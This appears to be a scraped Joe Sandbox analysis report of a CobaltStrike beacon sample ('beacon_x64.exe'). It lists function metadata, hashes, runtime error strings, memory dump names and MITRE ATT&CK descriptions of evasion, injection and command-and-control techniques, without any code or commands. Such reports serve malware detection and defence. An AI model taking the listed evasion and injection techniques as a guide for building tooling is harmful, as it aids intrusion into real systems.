Opcode ID: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
Instruction ID: 4660481e8b01e839d5568f54d4753b0e48e28ce44faaa9a024d6f640f261ebc1
Opcode Fuzzy Hash: 06cb82f9406a8be62de34f6836860520eff65df27a116840868cf6d0d4190e7e
Instruction Fuzzy Hash: C52180B5600A41C7D7149F25D85136A37A1B785B49F818037DB4967BF5CB7DC8C0CB18

Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Unknown error, xrefs: 00401D2C

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
Instruction ID: 59ce1e855a84c40590a6f1d7e5fdbb5789b26ea1a6d81feca49222ead83698e2
Opcode Fuzzy Hash: 060ed8b4f48fff566cb5ba301f549a09f8373ce553815899d5138d05545a2a64
Instruction Fuzzy Hash: 19016163918F88C3D6018F18E8003AA7331FB6E749F259316EF8C26565DB39D592C704

Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument domain error (DOMAIN), xrefs: 00401CE0

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
Instruction ID: 19d1ab342afe3ad9ea86bf5e66ade9d92ee5eaa311f738746577795edc5800f2
Opcode Fuzzy Hash: ffb7db3649f765f6754a53c0185fc82a21da43e3d5c879aecf4419589f6ac527
Instruction Fuzzy Hash: 5EF06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

Partial loss of significance (PLOSS), xrefs: 00401CF0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
Instruction ID: 72b50771eb885944449533605f92bc4095f36d05608744bf9fda369d3d258743
Opcode Fuzzy Hash: 18191e57db33b4e70e59b5a3d3e3df1f7191def02d3bc11653a7ff43ad774231
Instruction Fuzzy Hash: 49F06256858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Overflow range error (OVERFLOW), xrefs: 00401D00

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
Instruction ID: 80ece2abca5378ef05b9d519cef63ff07e16b40d1adb7ebcdaa7eeb16c026ebe
Opcode Fuzzy Hash: f9e84ebcb7ff6edc01efffe7a2503a57f9d003c7be521cdfefda22305502a0e8
Instruction Fuzzy Hash: 4FF06257858E8882D2029F1CE8003AB7331FB5EB89F245316EF8D36155DB29D5828704

Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
Instruction ID: 6c5864fbeb6c7f4b963c4697b524ad25517706f5afd63d8b54a146ff3f516c0f
Opcode Fuzzy Hash: 6dd4cf5b349fc847c3dcee8b8810e4477711ad86737d6eb6accb21fb67c8ba71
Instruction Fuzzy Hash: 48F06256858E8882D2029F1DE8003AB7331FB5E789F245316EF8D36155DB29D5828704

Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Total loss of significance (TLOSS), xrefs: 00401D20

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
Instruction ID: fb67b1574da8526718952bc4acd2e4b2938ff38d259f1ca349d8fde6e4d57ddc
Opcode Fuzzy Hash: 8660fa55e8950004dec4a570e9212e7fe6fefa6bca1faacdb15b35959efb44f5
Instruction Fuzzy Hash: 2BF06256858E8882D2029F1CE8003AB7331FB5E789F245316EF8D36555DF29D5828704

Function 00401C78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00401CC0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
Argument singularity (SIGN), xrefs: 00401C78

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
Instruction ID: c7517851250d5d007e0f967f84f5791a1ac141f8cb5801964327b6ba23b519ec
Opcode Fuzzy Hash: 2ba2f6e238f8e9c229c48e66cccf0b2e63387fe02db74aec0f0aa87893f784d2
Instruction Fuzzy Hash: 8CF09056814F8882C202DF2CE8003AB7330FB4EB8DF249316EF8C3A155DF29D5828704

Function 00779D44 Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00779D78

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

free.LIBCMT ref: 00779EBF
free.LIBCMT ref: 00779F23
free.LIBCMT ref: 00779F2F

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
Instruction ID: 569e9ae7afdec48145a5467a94a34f9f42179d840923850d9b9d8b17129ce471
Opcode Fuzzy Hash: 220d10eecca3932b28677e19a5d899b4e1de467fae96e5e6bbac4d4284393be2
Instruction Fuzzy Hash: E951B430318A098BDF58FB28989967D73D1FB98390F10897DE54FC3256EE78D9028782

Function 00763300 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00763363

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
Instruction ID: b7b940b90b4bf01e83db8c7768e1ba168d2c75deaeeac207c612ddd49f477674
Opcode Fuzzy Hash: eb22e79342f6c44f5990d3d93bc1acaf377093f70efb3d4e41a798bd81bbd69f
Instruction Fuzzy Hash: 0941D03061CE498B8B19DF2CD88513AB7E1FB8935071045ADEC8BC3246EE38ED02C681

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report beacon_x64.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: beacon_x64.exePID: 6456, Parent PID: 4004

General

Chronological Activities

Windows Analysis Report
beacon_x64.exe

Function 00401180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 196
sleepstringCOMMON

Function 00401630 Relevance: 6.0, APIs: 4, Instructions: 50
pipefileCOMMON

Function 00774E28 Relevance: 4.7, APIs: 3, Instructions: 190
stringCOMMONLIBRARYCODE

Function 00CB0000 Relevance: 1.7, APIs: 1, Instructions: 211
COMMON

Function 0077C3B8 Relevance: .1, Instructions: 122
COMMONLIBRARYCODE

Function 004017F8 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 54
threadCOMMON

Function 0076D68C Relevance: 7.8, APIs: 5, Instructions: 260
networkCOMMONLIBRARYCODE

Function 0076E014 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
networkCOMMONLIBRARYCODE

Function 00401595 Relevance: 4.5, APIs: 3, Instructions: 47
memorythreadCOMMON

Function 00787EE0 Relevance: 4.5, APIs: 3, Instructions: 46
COMMONLIBRARYCODE

Function 00401704 Relevance: 4.5, APIs: 3, Instructions: 45
fileCOMMON

Function 0076DA48 Relevance: 3.2, APIs: 2, Instructions: 159
networkCOMMONLIBRARYCODE

Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9
COMMON